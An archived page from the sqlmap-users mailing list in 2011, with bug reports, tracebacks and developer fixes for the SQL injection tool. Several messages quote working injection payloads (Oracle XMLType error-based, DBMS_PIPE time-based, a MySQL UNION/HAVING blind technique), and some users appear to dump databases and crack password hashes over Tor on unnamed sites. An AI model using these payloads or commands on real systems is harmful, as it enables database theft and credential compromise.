sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] Still errors in cracking

[Steve P. <ste...@gm...>]

On 07/26/2011 05:36 AM, Gianluca Brindisi wrote:
> Hi all!
> I still have errors while trying to crack retrieved hashes :(
> 
<--snip-->
>   File "/usr/local/lib/python2.6/multiprocessing/synchronize.py", line
> 33, in <module>
>     " function, see issue 3770.")
> ImportError: This platform lacks a functioning sem_open
> implementation, therefore, the required synchronization primitives
> needed will not function, see issue 3770.

Out of curiosity, what OS are you using?

>From what info I can dig up, this is a Python bug that only seems to
affect Solaris, AIX, openBSD and FreeBSD < 7.2.

The attached patch should fix it, unfortunately by disabling
multiprocessing on those platforms. Is there any other sync mechanism
available in some other multiprocessing library? Do enough people use
those OSs to make it worth it?
-- 
 | Steven Pinkham, Security Consultant    |
 | http://www.mavensecurity.com           |
 | GPG public key ID CD31CAFB             |

[sqlmap-users] Still errors in cracking

[Gianluca B. <g...@br...>]

Hi all!
I still have errors while trying to crack retrieved hashes :(

[11:32:53] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4293),
retry your run with the latest development version from the Subversion
repository. If the exception persists,
please send by e-mail to sql...@li... the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix
 it accordingly and get back to you.
sqlmap version: 1.0-dev (r4293)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --tor --url
*************************************** --password
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 86, in main
    start()
  File "/home/g/sqlmap-dev2/lib/controller/controller.py", line 554, in start
    action()
  File "/home/g/sqlmap-dev2/lib/controller/action.py", line 77, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash")
  File "/home/g/sqlmap-dev2/plugins/generic/enumeration.py", line 396,
in getPasswordHashes
    attackCachedUsersPasswords()
  File "/home/g/sqlmap-dev2/lib/utils/hash.py", line 246, in
attackCachedUsersPasswords
    results = dictionaryAttack(kb.data.cachedUsersPasswords)
  File "/home/g/sqlmap-dev2/lib/utils/hash.py", line 575, in dictionaryAttack
    retVal = _multiprocessing.Queue()
  File "/usr/local/lib/python2.6/multiprocessing/__init__.py", line
212, in Queue
    from multiprocessing.queues import Queue
  File "/usr/local/lib/python2.6/multiprocessing/queues.py", line 22,
in <module>
    from multiprocessing.synchronize import Lock, BoundedSemaphore,
Semaphore, Condition
  File "/usr/local/lib/python2.6/multiprocessing/synchronize.py", line
33, in <module>
    " function, see issue 3770.")
ImportError: This platform lacks a functioning sem_open
implementation, therefore, the required synchronization primitives
needed will not function, see issue 3770.

[*] shutting down at 11:32:53

Gianluca

Re: [sqlmap-users] Start and Stop

[Bernardo D. A. G. <ber...@gm...>]

Hi Oli,

I tested this against MySQL with boolean, error and UNION query
techniques. There was a minor glitch for --start in boolean. Now it's
fixed.
If you still encounter a bug, please provide us with further details
(dbms, session user, exact command line to replicate, etc.).

Bernardo


On 21 July 2011 17:42, Miroslav Stampar <mir...@gm...> wrote:
> Hi Olu.
>
> What are the simptoms and which dbms?
>
> One remark. Those two switches doesn't have anything to do with id-related
> fields.
>
> Kr
>
> On 21.7.2011. 18:39, "Olu Akindeinde" <sey...@gm...> wrote:
>> Hi,
>>
>> I have noticed that the --start and --stop options are not obeyed when I
>> use
>> them. Any ideas?
>>
>> Thanks


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

[sqlmap-users] bug report

[machak m. <mma...@gm...>]

[12:27:44] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4289), retry
your run with the latest development version from the Subversion repository.
If the exception persi
sts, please send by e-mail to sql...@li... the
following text and any information required to reproduce the bug. The
developers will try to reproduce th
e bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4289)
Python version: 2.7.1
Operating system: nt
Command line: C:\Users\Giga\Desktop\sqlmap1\sqlmap.py -u
********************************************* -o --random-agent --level 4
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "C:\Users\Giga\Desktop\sqlmap1\sqlmap.py", line 86, in main
start()
File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\controller.py", line 453,
in start
injection = checkSqlInjection(place, parameter, value)
File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\checks.py", line 408, in
checkSqlInjection
reqPayload, vector = unionTest(comment, place, parameter, value, prefix,
suffix)
File "C:\Users\Giga\Desktop\sqlmap1\lib\techniques\union\test.py", line 235,
in unionTest
validPayload, vector = __unionTestByCharBruteforce(comment, place,
parameter, value, prefix, suffix)
File "C:\Users\Giga\Desktop\sqlmap1\lib\techniques\union\test.py", line 214,
in __unionTestByCharBruteforce
validPayload, vector = __unionConfirm(comment, place, parameter, value,
prefix, suffix, count)
File "C:\Users\Giga\Desktop\sqlmap1\lib\techniques\union\test.py", line 177,
in __unionConfirm
validPayload, vector = __unionPosition(comment, place, parameter, value,
prefix, suffix, count)
File "C:\Users\Giga\Desktop\sqlmap1\lib\techniques\union\test.py", line 124,
in __unionPosition
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
File "C:\Users\Giga\Desktop\sqlmap1\lib\core\agent.py", line 447, in
concatQuery
castedFields = self.nullCastConcatFields(fieldsToCastStr)
File "C:\Users\Giga\Desktop\sqlmap1\lib\core\agent.py", line 340, in
nullCastConcatFields
nulledCastedFields.append(self.nullAndCastField(field))
File "C:\Users\Giga\Desktop\sqlmap1\lib\core\agent.py", line 294, in
nullAndCastField
nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query %
nulledCastedField
TypeError: not enough arguments for format string

[*] shutting down at 12:27:44

Re: [sqlmap-users] problem with oracle dump if column contents contain @

[This L. <thi...@ho...>]

Fixed.  :)  Thank you.

> Date: Sat, 23 Jul 2011 08:02:19 +0200
> Subject: Re: [sqlmap-users] problem with oracle dump if column contents contain @
> From: mir...@gm...
> To: thi...@ho...
> CC: sql...@li...
> 
> hi 'Little Piggy'.
> 
> could you please update and retry?
> 
> kr
> 
> On Sat, Jul 23, 2011 at 3:45 AM, This LittlePiggy
> <thi...@ho...> wrote:
> > When using sqlmap/1.0-dev (r4277)
> > ./sqlmap.py -v 4 -u
> > 'http://www.example.com/comunity/artickles_details.php?id=190'  -D BELCH -T
> > FELATORS -C FNAME,EMAIL --dump
> > banner:    'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production'
> > Place: GET
> > Parameter: id
> >     Type: boolean-based blind
> >     Title: AND boolean-based blind - WHERE or HAVING clause
> >     Payload: id=190 AND 9035=9035
> >     Type: error-based
> >     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
> >     Payload: id=190 AND 4286=(SELECT
> > UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT
> > (CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM
> > DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL)
> >     Type: AND/OR time-based blind
> >     Title: Oracle AND time-based blind
> >     Payload: id=190 AND
> > 6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5)
> > ---
> > [21:18:48] [INFO] the back-end DBMS is Oracle
> > web server operating system: Linux CentOS 5
> > web application technology: Apache 2.2.3, PHP 5.3.5
> > back-end DBMS: Oracle
> >
> > If any columns selected contain an @, the dump fails with
> > [21:42:10] [WARNING] possible server trimmed output detected (due to its
> > length): part-of-field-before-at-sign&quot; (not a Name)
> > Error at line 1
> > ORA-06512: at &quot;SYS.XMLTYPE&quot;, line 310
> > ORA-06512: at line 1 in <b>/var/www/html/inc/details_inc.php
> >
> > suggestions?
> >
> > ------------------------------------------------------------------------------
> > Storage Efficiency Calculator
> > This modeling tool is based on patent-pending intellectual property that
> > has been used successfully in hundreds of IBM storage optimization engage-
> > ments, worldwide.  Store less, Store more with what you own, Move data to
> > the right place. Try It Now!
> > http://www.accelacomm.com/jaw/sfnl/114/51427378/
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
> >
> 
> 
> 
> -- 
> Miroslav Stampar (@stamparm)
> 
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
 		 	   		  

Re: [sqlmap-users] problem with oracle dump if column contents contain @

[Miroslav S. <mir...@gm...>]

hi 'Little Piggy'.

could you please update and retry?

kr

On Sat, Jul 23, 2011 at 3:45 AM, This LittlePiggy
<thi...@ho...> wrote:
> When using sqlmap/1.0-dev (r4277)
> ./sqlmap.py -v 4 -u
> 'http://www.example.com/comunity/artickles_details.php?id=190'  -D BELCH -T
> FELATORS -C FNAME,EMAIL --dump
> banner:    'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production'
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=190 AND 9035=9035
>     Type: error-based
>     Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
>     Payload: id=190 AND 4286=(SELECT
> UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT
> (CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM
> DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL)
>     Type: AND/OR time-based blind
>     Title: Oracle AND time-based blind
>     Payload: id=190 AND
> 6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5)
> ---
> [21:18:48] [INFO] the back-end DBMS is Oracle
> web server operating system: Linux CentOS 5
> web application technology: Apache 2.2.3, PHP 5.3.5
> back-end DBMS: Oracle
>
> If any columns selected contain an @, the dump fails with
> [21:42:10] [WARNING] possible server trimmed output detected (due to its
> length): part-of-field-before-at-sign&quot; (not a Name)
> Error at line 1
> ORA-06512: at &quot;SYS.XMLTYPE&quot;, line 310
> ORA-06512: at line 1 in <b>/var/www/html/inc/details_inc.php
>
> suggestions?
>
> ------------------------------------------------------------------------------
> Storage Efficiency Calculator
> This modeling tool is based on patent-pending intellectual property that
> has been used successfully in hundreds of IBM storage optimization engage-
> ments, worldwide.  Store less, Store more with what you own, Move data to
> the right place. Try It Now!
> http://www.accelacomm.com/jaw/sfnl/114/51427378/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] problem with oracle dump if column contents contain @

[This L. <thi...@ho...>]

When using sqlmap/1.0-dev (r4277)
./sqlmap.py -v 4 -u 'http://www.example.com/comunity/artickles_details.php?id=190'  -D BELCH -T FELATORS -C FNAME,EMAIL --dump
banner:    'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production'
Place: GETParameter: id    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=190 AND 9035=9035
    Type: error-based    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)    Payload: id=190 AND 4286=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT (CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL)
    Type: AND/OR time-based blind    Title: Oracle AND time-based blind    Payload: id=190 AND 6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5)---
[21:18:48] [INFO] the back-end DBMS is Oracleweb server operating system: Linux CentOS 5web application technology: Apache 2.2.3, PHP 5.3.5back-end DBMS: Oracle

If any columns selected contain an @, the dump fails with 
[21:42:10] [WARNING] possible server trimmed output detected (due to its length): part-of-field-before-at-sign&quot; (not a Name)Error at line 1ORA-06512: at &quot;SYS.XMLTYPE&quot;, line 310ORA-06512: at line 1 in <b>/var/www/html/inc/details_inc.php

suggestions?
 		 	   		  

Re: [sqlmap-users] (no subject)

[Bernardo D. A. G. <ber...@gm...>]

Please, update to the latest development version from subversion
repository to have it fixed since long time.

Bernardo

On 22 July 2011 02:30, MulyyaLinkerDark Evilfingers
<sle...@gm...> wrote:
>  command :  home/****/public_html/ (on --os-shell)
>
> ================================================
> sqlmap version: 0.8
> Python version: 2.6.2
> Operating system: win32
> Traceback (most recent call last):
>  File "sqlmap.py", line 77, in main
>  File "lib\controller\controller.pyc", line 259, in start
>  File "lib\controller\action.pyc", line 141, in action
>  File "plugins\generic\takeover.pyc", line 98, in osShell
>  File "lib\takeover\abstraction.pyc", line 155, in initEnv
>  File "lib\takeover\web.pyc", line 189, in webInit
>  File "lib\request\connect.pyc", line 126, in getPage
>  File "urllib2.pyc", line 124, in urlopen
>  File "urllib2.pyc", line 383, in open
>  File "urllib2.pyc", line 401, in _open
>  File "urllib2.pyc", line 361, in _call_chain
>  File "urllib2.pyc", line 1130, in http_open
>  File "urllib2.pyc", line 1087, in do_open
>  File "httplib.pyc", line 656, in __init__
>  File "httplib.pyc", line 668, in _set_hostport
> InvalidURL: nonnumeric port: '80home'
>
> [*] shutting down at: 08:28:15
>
> ------------------------------------------------------------------------------
> 10 Tips for Better Web Security
> Learn 10 ways to better secure your business today. Topics covered include:
> Web security, SSL, hacker attacks & Denial of Service (DoS), private keys,
> security Microsoft Exchange, secure Instant Messaging, and much more.
> http://www.accelacomm.com/jaw/sfnl/114/51426210/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

[sqlmap-users] Oracle dumping

[m4l1c3 <mal...@gm...>]

I"ve always had trouble dumping Oracle databases.  I can usually see the
Databases and columns, whether they come down via Union or time-based or
whatever.  But when it comes down to:

./sqlmap.py URL:/parameters/etc/?id=3 --dump -T public -D not_sensitive

I get errors indicating there might only be one entry, and sqlmap fails to
detect it.  I can brute some table names, but this occurs every time I
encounter an Oracle database.

Has SQL Injection simply not progressed that far?  I've tried --level 5 and
--risk 3 just to be sure.

I'm glad to email some personal detail to help.

Thanks for the quick help, you've never disappointed.

[sqlmap-users] (no subject)

[MulyyaLinkerDark E. <sle...@gm...>]

  command :  home/****/public_html/ (on --os-shell)

================================================
sqlmap version: 0.8
Python version: 2.6.2
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 77, in main
  File "lib\controller\controller.pyc", line 259, in start
  File "lib\controller\action.pyc", line 141, in action
  File "plugins\generic\takeover.pyc", line 98, in osShell
  File "lib\takeover\abstraction.pyc", line 155, in initEnv
  File "lib\takeover\web.pyc", line 189, in webInit
  File "lib\request\connect.pyc", line 126, in getPage
  File "urllib2.pyc", line 124, in urlopen
  File "urllib2.pyc", line 383, in open
  File "urllib2.pyc", line 401, in _open
  File "urllib2.pyc", line 361, in _call_chain
  File "urllib2.pyc", line 1130, in http_open
  File "urllib2.pyc", line 1087, in do_open
  File "httplib.pyc", line 656, in __init__
  File "httplib.pyc", line 668, in _set_hostport
InvalidURL: nonnumeric port: '80home'

[*] shutting down at: 08:28:15

Re: [sqlmap-users] Start and Stop

[Miroslav S. <mir...@gm...>]

Hi Olu.

What are the simptoms and which dbms?

One remark. Those two switches doesn't have anything to do with id-related
fields.

Kr
On 21.7.2011. 18:39, "Olu Akindeinde" <sey...@gm...> wrote:
> Hi,
>
> I have noticed that the --start and --stop options are not obeyed when I
use
> them. Any ideas?
>
> Thanks

[sqlmap-users] Start and Stop

[Olu A. <sey...@gm...>]

Hi,

I have noticed that the --start and --stop options are not obeyed when I use
them. Any ideas?

Thanks

Re: [sqlmap-users] injectable parameter name can't be addressed

[Bernardo D. A. G. <ber...@gm...>]

Marek,

This should be dealt now, please svn update and retry.

Bernardo

On 21 July 2011 10:37, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi,
>
> Please, try to append an asterisk, *, to the parameter value you want
> to inject to.
> However, url-encoding the equal character in the parameter value
> should not cause a problem. As it seems that it does, we will track
> down the bug and fix accordingly. Thanks for reporting.
>
> Bernardo
>
>
> On 21 July 2011 10:30, Stiefenhofer, Marek <M.S...@r-...> wrote:
>> Hi all,
>>
>> we've found one rather common webapp that has SQLi "by design".
>> Example URL: http://hostname/query?param1=value1&where=[FILTER]
>>
>> My problem is that sqlmap doesn't identify the "where" as parameter as
>> long as it's value contains an equal-char, e.g.
>> "where=column%3D[Integer]". But "where=column is not null" is working.
>> I guess the reason is how sqlmap parses the URL and builds value/param
>> pairs.
>>
>> Is there some sort of workaround for this issue?
>>
>> -marek
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

Re: [sqlmap-users] injectable parameter name can't be addressed

[Bernardo D. A. G. <ber...@gm...>]

Hi,

Please, try to append an asterisk, *, to the parameter value you want
to inject to.
However, url-encoding the equal character in the parameter value
should not cause a problem. As it seems that it does, we will track
down the bug and fix accordingly. Thanks for reporting.

Bernardo


On 21 July 2011 10:30, Stiefenhofer, Marek <M.S...@r-...> wrote:
> Hi all,
>
> we've found one rather common webapp that has SQLi "by design".
> Example URL: http://hostname/query?param1=value1&where=[FILTER]
>
> My problem is that sqlmap doesn't identify the "where" as parameter as
> long as it's value contains an equal-char, e.g.
> "where=column%3D[Integer]". But "where=column is not null" is working.
> I guess the reason is how sqlmap parses the URL and builds value/param
> pairs.
>
> Is there some sort of workaround for this issue?
>
> -marek


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

[sqlmap-users] injectable parameter name can't be addressed

[Stiefenhofer, M. <M.S...@r-...>]

Hi all,

we've found one rather common webapp that has SQLi "by design".
Example URL: http://hostname/query?param1=value1&where=[FILTER]

My problem is that sqlmap doesn't identify the "where" as parameter as
long as it's value contains an equal-char, e.g.
"where=column%3D[Integer]". But "where=column is not null" is working.
I guess the reason is how sqlmap parses the URL and builds value/param
pairs. 

Is there some sort of workaround for this issue?

-marek

Re: [sqlmap-users] Error while cracking

[Miroslav S. <mir...@gm...>]

hi Gianluca.

to be honest, i am getting pissed at multiprocessing library more and more :).

i didn't know that they have problems with MacOSX and FreeBSD until
recently (including this error report).

please update to the latest revision (commited few secs ago) and try to rerun.

kr

On Wed, Jul 20, 2011 at 1:48 PM, Gianluca Brindisi <g...@br...> wrote:
> Found a bug while trying the password cracking.
> (I think r4269 is the latest version, in case I am wrong... sorry :)
>
> [13:39:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4269),
> retry your run with the latest development version from the Subversion
> repository. If the exception persists,
> please send by e-mail to sql...@li... the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix
>  it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4269)
> Python version: 2.6.5
> Operating system: posix
> Command line: sqlmap.py --tor -c sqlmap.conf --thread 5 -u
> ************************************ --forms --dump -C
> ******************************** -T ************** -D ***********
> ****** --batch
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>  File "sqlmap.py", line 86, in main
>    start()
>  File "/home/g/sqlmap-dev2/lib/controller/controller.py", line 554, in start
>    action()
>  File "/home/g/sqlmap-dev2/lib/controller/action.py", line 109, in action
>    conf.dbmsHandler.dumpTable()
>  File "/home/g/sqlmap-dev2/plugins/generic/enumeration.py", line
> 1745, in dumpTable
>    attackDumpedTable()
>  File "/home/g/sqlmap-dev2/lib/utils/hash.py", line 290, in attackDumpedTable
>    results = dictionaryAttack(attack_dict)
>  File "/home/g/sqlmap-dev2/lib/utils/hash.py", line 567, in dictionaryAttack
>    retVal = multiprocessing.Queue()
>  File "/usr/local/lib/python2.6/multiprocessing/__init__.py", line
> 212, in Queue
>    from multiprocessing.queues import Queue
>  File "/usr/local/lib/python2.6/multiprocessing/queues.py", line 22,
> in <module>
>    from multiprocessing.synchronize import Lock, BoundedSemaphore,
> Semaphore, Condition
>  File "/usr/local/lib/python2.6/multiprocessing/synchronize.py", line
> 33, in <module>
>    " function, see issue 3770.")
> ImportError: This platform lacks a functioning sem_open
> implementation, therefore, the required synchronization primitives
> needed will not function, see issue 3770.
>
> [*] shutting down at 13:39:49
>
> ------------------------------------------------------------------------------
> 10 Tips for Better Web Security
> Learn 10 ways to better secure your business today. Topics covered include:
> Web security, SSL, hacker attacks & Denial of Service (DoS), private keys,
> security Microsoft Exchange, secure Instant Messaging, and much more.
> http://www.accelacomm.com/jaw/sfnl/114/51426210/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] Error while cracking

[Gianluca B. <g...@br...>]

Found a bug while trying the password cracking.
(I think r4269 is the latest version, in case I am wrong... sorry :)

[13:39:49] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4269),
retry your run with the latest development version from the Subversion
repository. If the exception persists,
please send by e-mail to sql...@li... the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix
 it accordingly and get back to you.
sqlmap version: 1.0-dev (r4269)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --tor -c sqlmap.conf --thread 5 -u
************************************ --forms --dump -C
******************************** -T ************** -D ***********
****** --batch
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 86, in main
    start()
  File "/home/g/sqlmap-dev2/lib/controller/controller.py", line 554, in start
    action()
  File "/home/g/sqlmap-dev2/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/home/g/sqlmap-dev2/plugins/generic/enumeration.py", line
1745, in dumpTable
    attackDumpedTable()
  File "/home/g/sqlmap-dev2/lib/utils/hash.py", line 290, in attackDumpedTable
    results = dictionaryAttack(attack_dict)
  File "/home/g/sqlmap-dev2/lib/utils/hash.py", line 567, in dictionaryAttack
    retVal = multiprocessing.Queue()
  File "/usr/local/lib/python2.6/multiprocessing/__init__.py", line
212, in Queue
    from multiprocessing.queues import Queue
  File "/usr/local/lib/python2.6/multiprocessing/queues.py", line 22,
in <module>
    from multiprocessing.synchronize import Lock, BoundedSemaphore,
Semaphore, Condition
  File "/usr/local/lib/python2.6/multiprocessing/synchronize.py", line
33, in <module>
    " function, see issue 3770.")
ImportError: This platform lacks a functioning sem_open
implementation, therefore, the required synchronization primitives
needed will not function, see issue 3770.

[*] shutting down at 13:39:49

Re: [sqlmap-users] Save dumped data while parsing

[Bernardo D. A. G. <ber...@gm...>]

svn update from Subversion to get the latest development version. This
is fixed since a while. As soon as you hit CTRL-C it will dump to csv
file, log file and output the partial entries.

Bernardo


On 19 July 2011 00:40, anonymous anonymous <tm...@2c...> wrote:
> Good night!
> I dump big databases and sometimes server or channel not works, can you make
> writing to dump file while process goes but not when it's over?
> ------------------------------------------------------------------------------
> Storage Efficiency Calculator
> This modeling tool is based on patent-pending intellectual property that
> has been used successfully in hundreds of IBM storage optimization engage-
> ments, worldwide.  Store less, Store more with what you own, Move data to
> the right place. Try It Now!
> http://www.accelacomm.com/jaw/sfnl/114/51427378/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

[sqlmap-users] Save dumped data while parsing

[anonymous a. <tm...@2c...>]

<div>Good night!</div><div>I dump big databases and sometimes server or channel not works, can you make writing to dump file while process goes but not when it's over?</div>

Re: [sqlmap-users] Found a little error

[Ahmed S. <ah...@is...>]

Use the latest svn version

On Mon, Jul 18, 2011 at 8:06 AM, <nig...@em...> wrote:

> Good Morning,
>
> I found a little Error
>
> [07:44:38] [INFO] using custom list of dictionaries
> [07:44:38] [INFO] loading dictionary from
> 'C:\Users\Cerberus\Desktop\p\sqlmap.0.9\txt\wordlist.txt'
> do you want to use common password suffixes? (slow!) [y/N] y
> [07:44:49] [INFO] starting dictionary-based cracking (mysql_passwd)
> [08:02:08] [INFO] current status: 1dash... |'ascii' codec can't decode byte
> 0xe1 in position 37: ordinal not in range(128)
> [08:02:08] [CRITICAL] there was a problem while hashing entry: '1k\xe1li0'.
> Please report by e-mail to sql...@li...
>
> Greetz Nightman
>
>
>
> ------------------------------------------------------------------------------
> AppSumo Presents a FREE Video for the SourceForge Community by Eric
> Ries, the creator of the Lean Startup Methodology on "Lean Startup
> Secrets Revealed." This video shows you how to validate your ideas,
> optimize your ideas and identify your business strategy.
> http://p.sf.net/sfu/appsumosfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 

   - Ahmed Shawky El-Antry
   - Pen-tester, Programmer and System administrator
   - lnxg33k owner "http://lnxg33k.wordpress.com"
   - Isecur1ty team member"http://www.isecur1ty.org"
   - Twitter @lnxg33k

[sqlmap-users] Found a little error

[<nig...@em...>]

<html><head></head><body bgcolor='#FFFFFF' style='font-size:12px;background-color:#FFFFFF;font-family:Verdana, Arial, sans-serif;'>Good Morning,<br/><br/>I found a little Error<br/><br/>[07:44:38] [INFO] using custom list of dictionaries<br/>[07:44:38] [INFO] loading dictionary from 'C:\Users\Cerberus\Desktop\p\sqlmap.0.9\txt\wordlist.txt'<br/>do you want to use common password suffixes? (slow!) [y/N] y<br/>[07:44:49] [INFO] starting dictionary-based cracking (mysql_passwd)<br/>[08:02:08] [INFO] current status: 1dash... |'ascii' codec can't decode byte 0xe1 in position 37: ordinal not in range(128)<br/>[08:02:08] [CRITICAL] there was a problem while hashing entry: '1k\xe1li0'. Please report by e-mail to sql...@li...<br/><br/>Greetz Nightman<br/><br/></body></html>

Re: [sqlmap-users] Subquery payloads on mysql <4.1

[Miroslav S. <mir...@gm...>]

Hi Till.

I don't want to break your balls, but :)

There are lots of things that need to be fulfilled in this approach for it
to be useful. Hence, implementing it in automated tool would be unusable. In
short, lots of variables/parameters make systems self-destructible :)

Kr

Kr
On 13.7.2011. 14:55, "Till .ch" <ti...@ho...> wrote:

Re: [sqlmap-users] Subquery payloads on mysql <4.1

[Till .c. <ti...@ho...>]

I've found a way around it


this query is invalid:
 
1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM randomtable),1,1)) > 51
 


this is valid:
  1234 AND 1 = 0 UNION SELECT ORD(MID(IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)),1,1)) AS ENTR,id FROM  
randomtable
GROUP BY id HAVING ENTR > 51


The same way it would be possible to dump table content.


Necessary for this kind of payload is :
  - an injection point which just checks if the query returns a result at all.
  - knowledge of the number of selected columns
  - knowledge of one column name


Cheers
 - Till



> Date: Tue, 12 Jul 2011 23:45:41 +0200
> Subject: Re: [sqlmap-users] Subquery payloads on mysql <4.1
> From: mir...@gm...
> To: ti...@ho...
> CC: sql...@li...
> 
> found one (VM) and done some tests :)
> 
> you are right, subqueries can't be used on MySQL < 4.1 which means
> that sql injection there is of no significant value (e.g. dumping of
> table content which inherently requires subquerying mechanism).
> 
> kr
> 
> On Tue, Jul 12, 2011 at 11:23 PM, Miroslav Stampar
> <mir...@gm...> wrote:
> > ok, got the point.
> >
> > also seen the same thing on Twitter few days ago, maybe it was you :)
> >
> > two things:
> > A) does anyone have experience with subqueries on MySQL < 4.1?
> > B) is there some VM around that carry for example MySQL 3.x ready for testing?
> >
> > kr
> >
> > On Tue, Jul 12, 2011 at 1:01 PM, Till .ch <ti...@ho...> wrote:
> >> Hi
> >>
> >>
> >> Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap detected
> >> the injection point just fine, but struggled with gathering information
> >> about other tables.
> >> I guess this happened due to the fact as subqueries have been introduced
> >> with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html)
> >> and thus payloads like the following are regarded as an invalid query on
> >> mysql <4.1:
> >>
> >>
> >> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32))
> >> FROM randomtable),1,1)) > 51
> >>
> >>
> >> Best Regards
> >> Till
> >>
> >> ------------------------------------------------------------------------------
> >> All of the data generated in your IT infrastructure is seriously valuable.
> >> Why? It contains a definitive record of application performance, security
> >> threats, fraudulent activity, and more. Splunk takes this data and makes
> >> sense of it. IT sense. And common sense.
> >> http://p.sf.net/sfu/splunk-d2d-c2
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
> >
> >
> >
> > --
> > Miroslav Stampar (@stamparm)
> >
> > E-mail: miroslav.stampar (at) gmail.com
> > PGP Key ID: 0xB5397B1B
> >
> 
> 
> 
> -- 
> Miroslav Stampar (@stamparm)
> 
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
 		 	   		  

Re: [sqlmap-users] sqlmap bug (1.0-dev (r4264))

[Bernardo D. A. G. <ber...@gm...>]

